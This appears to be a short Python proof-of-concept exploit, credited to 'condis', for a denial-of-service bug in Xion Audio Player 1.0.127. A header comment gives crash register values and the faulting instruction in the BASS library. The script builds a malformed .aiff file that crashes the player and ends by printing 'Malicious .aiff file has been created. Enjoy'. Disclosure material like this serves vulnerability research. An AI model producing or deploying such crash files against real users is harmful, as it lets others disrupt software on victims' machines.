#!/usr/bin/python# -------------------------------------------------------------------# Xion Audio Player 1.0.127 (.aiff) Denial of Service Vulnerability# found by condis## Download: http://xion.r2.com.au/index.php?page=download# Tested on : Windows XP SP3 Professional PL## Registers : ## EAX 00000000# ECX 02D0B488# EDX 7C90E4F4 ntdll.KiFastSystemCallRet# EBX 02D0B4F8# ESP 02D0B4F8# EBP 02D0CA60# ESI 003D8D80# EDI 00001A00# EIP 11013C18 BASS.11013C18## 11013C18 C740 20 01000000 MOV DWORD PTR DS:[EAX+20],1 <--- crash## "Access Violation while writing to 00000020"## I've also found this kind of bug while playing around with .flac # files so I think that handling all of the supported formats must be # really messed up :<# --------------------------------------------------------------------
evil= "FORM\x00\x00\x37\xA4AIFFCOMM"
evil +="A"# <--- crash (rest of the file doesn't matters)
aiff = open('xion-crash.aiff','w')
aiff.write(evil)
aiff.close()
print "Malicious .aiff file has been created. Enjoy"
